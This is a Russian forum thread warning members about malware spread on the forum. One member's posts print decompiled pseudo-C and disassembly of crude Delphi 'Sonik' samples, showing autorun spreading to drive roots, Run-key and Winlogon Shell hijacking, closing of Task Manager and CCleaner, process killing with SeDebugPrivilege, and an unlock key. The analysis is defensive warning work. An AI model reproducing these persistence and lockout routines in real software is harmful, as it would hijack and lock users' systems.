Вирус на форуме

[admin]

У меня Avast не ругается. Тему удалил на всякий случай. Если еще что-то будет - пишите

[Реклама]

Реклама: ООО ТД Промэлектроника, ИНН: 6659197470, Тел: 8 (800) 1000-321

[SVN]

Всё нормально...Microsoft Security Essentials + AVZ - молчат...

[Реклама]

20% скидка на весь каталог электронных компонентов в ТМ Электроникс!

Акция "Лето ближе - цены ниже", успей сделать выгодные покупки!

Плюс весь апрель действует скидка 10% по промокоду APREL24 + 15% кэшбэк и бесплатная доставка!

Перейти на страницу акции

Реклама: ООО ТМ ЭЛЕКТРОНИКС, ИНН: 7806548420, info@tmelectronics.ru, +7(812)4094849

[1_elektronik]

блин я ж не придумывал, оно и мусоре лезет

[Реклама]

Выбираем схему BMS для корректной работы литий-железофосфатных (LiFePO4) аккумуляторов

 Обязательным условием долгой и стабильной работы Li-FePO4-аккумуляторов, в том числе и производства EVE Energy, является применение специализированных BMS-микросхем. Литий-железофосфатные АКБ отличаются такими характеристиками, как высокая многократность циклов заряда-разряда, безопасность, возможность быстрой зарядки, устойчивость к буферному режиму работы и приемлемая стоимость. Но для этих АКБ, также как и для других, очень важен контроль процесса заряда и разряда, а специализированных микросхем для этого вида аккумуляторов не так много. Инженеры КОМПЭЛ подготовили список имеющихся микросхем и возможных решений от разных производителей. Подробнее>>

Реклама: АО КОМПЭЛ, ИНН: 7713005406, ОГРН: 1027700032161

[fant]

То ж Аваст и тоже молчит.

[admin]

Ругается ваш антивир на изображение в подписи: http://hottabych.net/ubar/hottabych-net_grin2.jpg

Но ругается видимо зря.

Вот результат проверки с VirusTotal: http://www.virustotal.com/file-scan/report.html?id=315e5de27602c58a160799fa9cff0362557d29125ee40c6b8a4ea3e3b30af96c-1315021451

Из 44 антивирусов ни один не показал вируса

[1_elektronik]

однако точно интересно чем оно ему не угодило? :D

[Lexus]

ESET ругается на картинки? Я не удивлен. Добрую сотню раз с этим сталкивался, когда данный антивирус был установлен на рабочих ПК.

[marinovsoft]

ВНИМАНИЕ!

Коллеги. На нашем форуме активировался вирусный спамер. Публикует сообщения с аттачем, в котором находится очень убогая поделка на вирус-autoruner.

В аттаче находится rar-архив, в котором запакованы два файла.

1.exe
autorun.inf

Запросы на добавление этого недовируса в вирусные базы крупнейших производителей антивирусов уже отправлены.

Проявляйте бдительность, не скачивайте эти файлы!!!

http://www.virustotal.com/file-scan/report.html?id=7aec3f35c9a70708af9b11989e44dd910672f61e6ad483525b09df9ae1c70cfb-1319128866

Вирус написан идиотом, открывшим для себя delphi. Предоположительно вирус будет называться "WIN32.SONIK.IDIOT.HLLP"

Немного псевдоси

int __usercall TForm1_Timer1Timer<eax>(int a1<ebx>)
{
 HWND v1; // eax@1
 HWND v2; // eax@3
 HWND v3; // eax@5
 HWND v4; // eax@7
 int v5; // edx@9
 int v6; // ebx@9
 int v7; // ecx@9
 int v8; // ecx@9
 int v9; // ecx@9
 int v10; // ecx@9
 int v11; // ecx@9
 int v12; // ecx@9
 int v13; // edx@9
 int v14; // ebx@9
 int v15; // ecx@9
 unsigned int v17; // [sp-10h] [bp-18h]@1
 int (*v18)(); // [sp-Ch] [bp-14h]@1
 int (*v19)(); // [sp-8h] [bp-10h]@1
 int v20; // [sp-4h] [bp-Ch]@1
 int v21; // [sp+0h] [bp-8h]@1
 int v22; // [sp+4h] [bp-4h]@1
 int v23; // [sp+8h] [bp+0h]@1

 v22 = 0;
 v21 = 0;
 v20 = a1;
 v19 = (int (*)())&v23;
 v18 = loc_44E51A;
 v17 = __readfsdword(0);
 __writefsdword(0, (unsigned int)&v17);
 v1 = FindWindowA(0, "Диспетчер задач Windows");
 if ( v1 )
   SendMessageA(v1, 0x112u, 0xF060u, 0);
 v2 = FindWindowA(0, "Настройка системы");
 if ( v2 )
   SendMessageA(v2, 0x112u, 0xF060u, 0);
 v3 = FindWindowA(0, "Anti-autorun 3.0");
 if ( v3 )
   SendMessageA(v3, 0x112u, 0xF060u, 0);
 v4 = FindWindowA(0, "Piriform CCleaner");
 if ( v4 )
   SendMessageA(v4, 0x112u, 0xF060u, 0);
 CopyFileA("1.exe", "C:\\1.exe", -1);
 CopyFileA("autorun.inf", "C:\\autorun.inf", -1);
 CopyFileA("1.exe", "D:\\1.exe", -1);
 CopyFileA("autorun.inf", "D:\\autorun.inf", -1);
 CopyFileA("1.exe", "E:\\1.exe", -1);
 CopyFileA("autorun.inf", "E:\\autorun.inf", -1);
 CopyFileA("1.exe", "F:\\1.exe", -1);
 CopyFileA("autorun.inf", "F:\\autorun.inf", -1);
 CopyFileA("1.exe", "J:\\1.exe", -1);
 CopyFileA("autorun.inf", "J:\\autorun.inf", -1);
 CopyFileA("1.exe", "B:\\1.exe", -1);
 CopyFileA("autorun.inf", "B:\\autorun.inf", -1);
 CopyFileA("1.exe", "A:\\1.exe", -1);
 CopyFileA("autorun.inf", "A:\\autorun.inf", -1);
 CopyFileA("1.exe", "G:\\1.exe", -1);
 CopyFileA("autorun.inf", "G:\\autorun.inf", -1);
 CopyFileA("1.exe", "I:\\1.exe", -1);
 CopyFileA("autorun.inf", "I:\\autorun.inf", -1);
 CopyFileA("C:\\1.exe", "D:\\1.exe", -1);
 CopyFileA("C:\\autorun.inf", "D:\\autorun.inf", -1);
 CopyFileA("1.exe", "C:\\Documents and Settings\\All Users\\Главное меню\\Программы\\Автозагрузка\\1.exe", -1);
 CopyFileA("1.exe", "C:\\Documents and Settings\\Admin\\Главное меню\\Программы\\Автозагрузка\\1.exe", -1);
 CopyFileA("1.exe", "C:\\Documents and Settings\\Default User\\Главное меню\\Программы\\Автозагрузка\\1.exe", -1);
 Sysutils::DeleteFile("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe");
 LOBYTE(v5) = 1;
 v6 = Registry::TRegistry::TRegistry(off_4255CC, v5);
 Registry::TRegistry::SetRootKey(v6, -2147483647);
 LOBYTE(v7) = 1;
 Registry::TRegistry::OpenKey(v6, "Software", v7);
 LOBYTE(v8) = 1;
 Registry::TRegistry::OpenKey(v6, "Microsoft", v8);
 LOBYTE(v9) = 1;
 Registry::TRegistry::OpenKey(v6, "Windows", v9);
 LOBYTE(v10) = 1;
 Registry::TRegistry::OpenKey(v6, &str_CurrentVersion[1], v10);
 LOBYTE(v11) = 1;
 Registry::TRegistry::OpenKey(v6, &str_Run[1], v11);
 unknown_libname_789(*(_DWORD *)off_44FFCC[0], &v21);
 System::__linkproc___LStrCatN(&v22, 3, v12, v21, &str___14[1]);
 Registry::TRegistry::WriteString(v6, &str_1_exe_0[1], v22);
 LOBYTE(v13) = 1;
 v14 = Registry::TRegistry::TRegistry(off_4255CC, v13);
 Registry::TRegistry::SetRootKey(v14, -2147483647);
 LOBYTE(v15) = 1;
 Registry::TRegistry::OpenKey(v14, &str_Software_Micros[1], v15);
 Registry::TRegistry::WriteInteger(v14, &str_Hidden[1], 0);
 Registry::TRegistry::CloseKey(v14);
 System::TObject::Free(v14);
 __writefsdword(0, v17);
 v19 = loc_44E521;
 return System::__linkproc___LStrArrayClr(&v21, 2);
}

LRESULT __cdecl TForm1_FormCreate()
{
 HWND v0; // ebx@1
 LONG v1; // eax@1
 HWND v2; // eax@1
 HWND v3; // eax@1
 HWND v4; // eax@1
 HWND v5; // ebx@1

 v0 = *(HWND *)(*(_DWORD *)off_44FFCC[0] + 48);
 v1 = GetWindowLongA(*(HWND *)(*(_DWORD *)off_44FFCC[0] + 48), -20);
 SetWindowLongA(v0, -20, v1 | 0x80);
 Sysutils::FileOpen(&str_C__windows_syst[1], 16);
 Sysutils::FileSetAttr(&str_1_exe[1], 3);
 Sysutils::FileSetAttr(&str_autorun_inf[1], 3);
 v2 = FindWindowA("Shell_TrayWnd", 0);
 v3 = FindWindowExA(v2, 0, "Button", 0);
 MoveWindow(v3, 0, 0, 100, 32, -1);
 v4 = FindWindowA("Shell_TrayWnd", 0);
 v5 = FindWindowExA(v4, 0, "Button", 0);
 SetWindowTextA(v5, "Sonik");
 return SendMessageA(v5, 0x200u, 0, 0);
}

Изменено 20 октября, 2011 пользователем marinovsoft

[stilus.]

Что то у меня сегодня глючит форум... - может у меня в компе проблема?

У всех - всё нормально?

[stilus.]

Блин, скажите хоть кто нить - у всех нормально работает форум?

- или мне гугл дурное обновление свого браузера закинул?

Пишу пост - получается их два .... ставлю смайлик - получается их два

[IIIytNIK]

У меня все ровно

[stilus.]

Спс ... значит буду свой комп шерстить

[atmicandr]

Блин, скажите хоть кто нить - у всех нормально работает форум?

- или мне гугл дурное обновление свого браузера закинул?

Пишу пост - получается их два .... ставлю смайлик - получается их два

Володя, такая шняга бывает и на других форумах, причём отправка первого сообщения по отчету неудачная по причине того что типа сообщение очень короткое, а вторая попытка удачная... И вот они два сообщения друг под другом...

[stilus.]

Ок, спасибо понял

[MiSol62]

В теме "Аниме" - вирус. Мой антивир очень сильно ругался.

[Alex]

В теме "Аниме"

Подробнее можно ?

А лучше на посте нажать кнопочку "Жалоба". Модераторы быстрее доберутся...

[Radiotehnika S-90]

Пора такие темы уже закрывать.

[MiSol62]

Так она уже в мусорке.

[marinovsoft]

Вирусный спамер в очередной раз активизировался

Итак, его очередная поделка, называемая "диспетчером задач sonik" обладает следующим функионалом.

Исполняемый файл имеет имя SONIKProcess.exe, запакован exe-packer'ом ASPack 2.12. При запуске исполняемого файла происходит его копирование в корневой каталог диска C:\, далее в ветке реестра

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon меняет с установленного по умолчанию "explorer.exe" на "explorer.exe, c:\SONIKProcess.exe"

Таким образом обеспечивается автозапуск.

//procedure TForm1.FormCreate;
004582DC    push       ebp
004582DD    mov        ebp,esp
004582DF    add        esp,0FFFFFD34
004582E5    push       ebx
004582E6    push       esi
004582E7    push       edi
004582E8    xor        ecx,ecx
004582EA    mov        dword ptr [ebp-2C8],ecx
004582F0    mov        dword ptr [ebp-2CC],ecx
004582F6    mov        dword ptr [ebp-2C4],ecx
004582FC    mov        esi,eax
004582FE    mov        ecx,65
00458303    lea        eax,[ebp-2C0]
00458309    mov        edx,dword ptr ds:[401094]; String
0045830F    call       @InitializeArray
00458314    lea        edi,[ebp-12C]
0045831A    xor        eax,eax
0045831C    push       ebp
0045831D    push       45852D
00458322    push       dword ptr fs:[eax]
00458325    mov        dword ptr fs:[eax],esp
00458328    mov        dl,1
0045832A    mov        eax,[0045780C]; TRegistry
0045832F    call       TRegistry.Create; TRegistry.Create
00458334    mov        ebx,eax
00458336    mov        edx,80000002
0045833B    mov        eax,ebx
0045833D    call       TRegistry.SetRootKey
00458342    mov        cl,1
00458344    mov        edx,458544; 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' ; вот в эту ветку пишем
00458349    mov        eax,ebx
0045834B    call       TRegistry.OpenKey
00458350    mov        ecx,458584; 'explorer.exe, C:\\SONIKProcess.exe' ; А вот эту строку как раз и пишем, сравните с тем, что у вас по-умолчанию.
00458355    mov        edx,4585B0; 'Shell' ; в этот ключ
0045835A    mov        eax,ebx
0045835C    call       TRegistry.WriteString
00458361    mov        eax,ebx
00458363    call       TRegistry.CloseKey
00458368    mov        eax,ebx
0045836A    call       TObject.Free
0045836F    push       0FF
00458371    push       4585B8                                          ; Имя файла-приемника (см.ниже в константах)
00458376    lea        edx,[ebp-2C4]
0045837C    xor        eax,eax
0045837E    call       00402DEC                                        ; узнали имя файла самого себя
00458383    mov        eax,dword ptr [ebp-2C4]
00458389    call       @LStrToPChar
0045838E    push       eax
0045838F    call       kernel32.CopyFileA                              ; Скопировали самого себя
00458394    push       71
00458396    push       0
00458398    push       71
0045839A    mov        eax,[0045CC14]; gvar_0045CC14:TForm1
0045839F    call       TWinControl.GetHandle
004583A4    push       eax
004583A5    call       user32.RegisterHotKey ; регистрируем горячую клавишу в системе. Код 0x71 - F2
004583AA    mov        eax,4585D4; 'c:\\1.bmp'                          ; тут вообще какой-то сюрр начинается. 
004583AF    call       FileExists
004583B4    test       al,al
>004583B6    jne        004583CE
004583B8    mov        eax,dword ptr [esi+33C]; TForm1.Image1:TImage
004583BE    mov        eax,dword ptr [eax+168]; TImage.Picture:TPicture
004583C4    mov        edx,4585E8; 'C:\\1.bmp'
004583C9    call       TPicture.SaveToFile
004583CE    mov        eax,dword ptr [esi+300]; TForm1.Label1:TLabel
004583D4    call       TControl.BringToFront
004583D9    mov        eax,dword ptr [esi+324]; TForm1.Label2:TLabel
004583DF    call       TControl.BringToFront
004583E4    mov        eax,dword ptr [esi+33C]; TForm1.Image1:TImage
004583EA    mov        eax,dword ptr [eax+168]; TImage.Picture:TPicture
004583F0    mov        edx,4585E8; 'C:\\1.bmp'
004583F5    call       TPicture.LoadFromFile                             ; А тут заканчивается
004583FA    mov        eax,dword ptr [esi+330]; TForm1.Panel1:TPanel
00458400    call       TControl.Hide
00458405    push       0EC
00458407    mov        eax,[0045B0BC]; ^Application:TApplication
0045840C    mov        eax,dword ptr [eax]
0045840E    mov        ebx,dword ptr [eax+30]; TApplication.FHandle:HWND
00458411    push       ebx
00458412    call       user32.GetWindowLongA
00458417    or         eax,80
0045841C    push       eax
0045841D    push       0EC
0045841F    mov        eax,[0045B0BC]; ^Application:TApplication
00458424    push       ebx
00458425    call       user32.SetWindowLongA
0045842A    xor        ebx,ebx
0045842C    xor        edx,edx
0045842E    mov        eax,0F
00458433    call       004574D4
00458438    mov        dword ptr [ebp-4],eax
0045843B    mov        dword ptr [edi],128
00458441    mov        edx,edi
00458443    mov        eax,dword ptr [ebp-4]
00458446    call       004574F4
0045844B    lea        eax,[ebp+ebx*4-2C0]
00458452    lea        edx,[edi+24]
00458455    mov        ecx,104
0045845A    call       @LStrFromArray
>0045845F    jmp        004584AE
00458461    inc        ebx
00458462    push       4585FC; '('
00458467    mov        eax,dword ptr [edi+8]
0045846A    xor        edx,edx
0045846C    push       edx
0045846D    push       eax
0045846E    lea        eax,[ebp-2C8]
00458474    call       IntToStr
00458479    push       dword ptr [ebp-2C8]
0045847F    push       458608; ') '
00458484    lea        eax,[ebp-2CC]
0045848A    lea        edx,[edi+24]
0045848D    mov        ecx,104
00458492    call       @LStrFromArray
00458497    push       dword ptr [ebp-2CC]
0045849D    lea        eax,[ebp+ebx*4-2C0]
004584A4    mov        edx,4
004584A9    call       @LStrCatN
004584AE    mov        edx,edi
004584B0    mov        eax,dword ptr [ebp-4]
004584B3    call       00457514
004584B8    test       eax,eax
<004584BA    jne        00458461
004584BC    mov        eax,dword ptr [esi+2F8]; TForm1.ListBox1:TListBox
004584C2    mov        edx,dword ptr [eax]
004584C4    call       dword ptr [edx+0D8]; TCustomListBox.Clear
004584CA    mov        edi,ebx
004584CC    test       edi,edi
>004584CE    jl         004584F0
004584D0    inc        edi
004584D1    lea        ebx,[ebp-2C0]
004584D7    mov        eax,dword ptr [esi+2F8]; TForm1.ListBox1:TListBox
004584DD    mov        eax,dword ptr [eax+218]; TListBox.FItems:TStrings
004584E3    mov        edx,dword ptr [ebx]
004584E5    mov        ecx,dword ptr [eax]
004584E7    call       dword ptr [ecx+38]; TStrings.Add
004584EA    add        ebx,4
004584ED    dec        edi
<004584EE    jne        004584D7
004584F0    mov        eax,dword ptr [ebp-4]
004584F3    push       eax
004584F4    call       kernel32.CloseHandle
004584F9    xor        eax,eax
004584FB    pop        edx
004584FC    pop        ecx
004584FD    pop        ecx
004584FE    mov        dword ptr fs:[eax],edx
00458501    push       458534
00458506    lea        eax,[ebp-2CC]
0045850C    mov        edx,3
00458511    call       @LStrArrayClr
00458516    lea        eax,[ebp-2C0]
0045851C    mov        ecx,65
00458521    mov        edx,dword ptr ds:[401094]; String
00458527    call       @FinalizeArray
0045852C    ret
<0045852D    jmp        @HandleFinally
<00458532    jmp        00458506
00458534    pop        edi
00458535    pop        esi
00458536    pop        ebx
00458537    mov        esp,ebp
00458539    pop        ebp
0045853A    ret
00458544 <AnsiString> 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
00458584 <AnsiString> 'explorer.exe, C:\\SONIKProcess.exe'
004585B0 <AnsiString> 'Shell'
004585B8 'C:\SONIKProcess.exe',0
004585D4 <AnsiString> 'c:\\1.bmp'
004585E8 <AnsiString> 'C:\\1.bmp'
004585FC <AnsiString> '('
00458608 <AnsiString> ') '

Код процедуры завершения чужих процессов, псевдоси

//----- (0045860C) --------------------------------------------------------
int __fastcall sub_45860C(DWORD dwProcessId)
{
 DWORD v1; // esi@1
 int v2; // ebx@1
 HANDLE v3; // eax@1
 HANDLE v4; // eax@5
 void *v5; // esi@5
 HANDLE TokenHandle; // [sp+0h] [bp-2Ch]@1
 struct _LUID Luid; // [sp+8h] [bp-24h]@2
 DWORD ReturnLength; // [sp+10h] [bp-1Ch]@4
 struct _TOKEN_PRIVILEGES NewState; // [sp+14h] [bp-18h]@4

 v1 = dwProcessId;
 v2 = 0;
 v3 = j_GetCurrentProcess();
 if ( j_OpenProcessToken(v3, 0x28u, &TokenHandle) )
 {
   if ( j_LookupPrivilegeValueA(0, "SeDebugPrivilege", &Luid) )
   {
     NewState.PrivilegeCount = 1;
     NewState.Privileges[0].Luid.LowPart = Luid.LowPart;
     NewState.Privileges[0].Luid.HighPart = Luid.HighPart;
     NewState.Privileges[0].Attributes = 2;
     j_AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, &NewState, &ReturnLength);
     if ( !j_GetLastError() )
     {
       v4 = j_OpenProcess(1u, 0, v1);
       v5 = v4;
       if ( v4 )
       {
         if ( j_TerminateProcess(v4, 0xFFFFFFFFu) )
         {
           j_CloseHandle(v5);
           NewState.Privileges[0].Attributes = 0;
           j_AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, &NewState, &ReturnLength);
           if ( !j_GetLastError() )
             LOBYTE(v2) = 1;
         }
       }
     }
   }
   else
   {
     j_CloseHandle(TokenHandle);
   }
 }
 return v2;
}

Полезность данной поделки сомнительна.

А вредность 100% - запись себя в реестр в системный ключ автозапуска. Что там еще аффтар понаписал - х.з.

Коллеги! Пользуйтесь ПО профессиональных программистов, не подвергайте себя риску!

Изменено 23 февраля, 2012 пользователем marinovsoft

[Igel]

Опять этот ламерописатель

[ПАПА]

А нельзя как то вычислить этого затейника, и кто поближе живет, банально начистить лицо?

[Igel]

дану, мараццо только, жизнь научит...

либо не научит, тогда дурнем и помрёт

ежли у товарисча изначально деструктивный подход то либо ему бабы не дают, либо ещё куча разных факторов...

З.Ы. так, мысли вслух, не претендующие на мудрость...

Изменено 23 февраля, 2012 пользователем eu1sw

[1_elektronik]

Анекдот в тему:

Идёт бабушка видит трое пацанов бьют одного

бабушка - что ж вы его бьёте ироды?

пацаны - уйди бабка не мешай, мы спамера поймали

бабушка - что ж вы его руками то? ногами бейте гада!

[marinovsoft]

Аффтар, сравни

http://technet.microsoft.com/ru-ru/sysinternals/bb896653

http://technet.microsoft.com/ru-ru/sysinternals/bb963902

http://systemexplorer.net/

Даже в FAR Manager свой диспетчер есть.

[marinovsoft]

Вирусописатель опять активизировался. Данный клон забанен. Имя файла DrWeb.Setup.exe.

В этот раз поделка выглядит так

Запросы в антивирусные лаборатории отправлены

Добавляет себя в shell (см. выше). Пытается не давать запускать диспетчер задач, Мой компьютер и Запуск программ из меню пуск (Win+R). В этой версии ключ разблокировки 11071968.

Немного псевдоси.

При запуске

int __usercall TForm1_FormCreate<eax>(int a1<ebx>)
{
 const CHAR *v1; // eax@1
 int v2; // edx@1
 int v3; // ecx@1
 HWND v4; // eax@1
 unsigned int v6; // [sp-10h] [bp-14h]@1
 int (*v7)(); // [sp-Ch] [bp-10h]@1
 int (*v8)(); // [sp-8h] [bp-Ch]@1
 int v9; // [sp-4h] [bp-8h]@1
 int v10; // [sp+0h] [bp-4h]@1
 int v11; // [sp+4h] [bp+0h]@1

 v10 = 0;
 v9 = a1;
 v8 = (int (*)())&v11;
 v7 = loc_4536B9;
 v6 = __readfsdword(0);
 __writefsdword(0, (unsigned int)&v6);
 System::ParamStr(0, &v10);
 v1 = (const CHAR *)System::__linkproc___LStrToPChar(v10);
 CopyFileA(v1, "C:\\explorer.exe", -1);
 LOBYTE(v2) = 1;
 dword_456B74 = Registry::TRegistry::TRegistry(off_45302C, v2);
 Registry::TRegistry::SetRootKey(dword_456B74, -2147483646);
 LOBYTE(v3) = 1;
 Registry::TRegistry::OpenKey(dword_456B74, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", v3);
 Registry::TRegistry::WriteString(dword_456B74, &str_Shell[1], &str_explorer_exe[1]);
 Registry::TRegistry::CloseKey(dword_456B74);
 System::TObject::Free(dword_456B74);
 v4 = FindWindowA("Shell_TrayWnd", 0);
 ShowWindow(v4, 0);
 __writefsdword(0, v6);
 v8 = loc_4536C0;
 return System::__linkproc___LStrClr(&v10);
}

При нажатии кнопки разблокировки.

int __usercall TForm1_Button1Click<eax>(int a1<eax>, int a2<ebx>)
{
 int v2; // edx@1
 char v3; // zf@1
 int v4; // ecx@2
 HWND v5; // eax@2
 unsigned int v7; // [sp-10h] [bp-14h]@1
 int (*v8)(); // [sp-Ch] [bp-10h]@1
 int (*v9)(); // [sp-8h] [bp-Ch]@1
 int v10; // [sp-4h] [bp-8h]@1
 int v11; // [sp+0h] [bp-4h]@1
 int v12; // [sp+4h] [bp+0h]@1

 v11 = 0;
 v10 = a2;
 v9 = (int (*)())&v12;
 v8 = loc_453908;
 v7 = __readfsdword(0);
 __writefsdword(0, (unsigned int)&v7);
 Controls::TControl::GetText(*(_DWORD *)(a1 + 772), &v11);
 v3 = System::__linkproc___LStrCmp(v11, &str_11071968[1]);
 if ( v3 )
 {
   LOBYTE(v2) = 1;
   dword_456B74 = Registry::TRegistry::TRegistry(off_45302C, v2);
   Registry::TRegistry::SetRootKey(dword_456B74, -2147483646);
   LOBYTE(v4) = 1;
   Registry::TRegistry::OpenKey(dword_456B74, &str_Software_Micros[1], v4);
   Registry::TRegistry::WriteString(dword_456B74, &str_Shell_0[1], &str_explorer_exe[1]);
   Registry::TRegistry::CloseKey(dword_456B74);
   v5 = FindWindowA("Shell_TrayWnd", 0);
   ShowWindow(v5, 5);
   Forms::TApplication::Terminate(*(_DWORD *)off_454FAC[0]);
 }
 __writefsdword(0, v7);
 v9 = loc_45390F;
 return System::__linkproc___LStrClr(&v11);
}

Файло копирует себя в корень диска C:\explorer.exe и полностью перезаписывает shell, тем самым блокируюя работу windows.

Более детальный анализ делать лень.

Изменено 5 марта, 2012 пользователем marinovsoft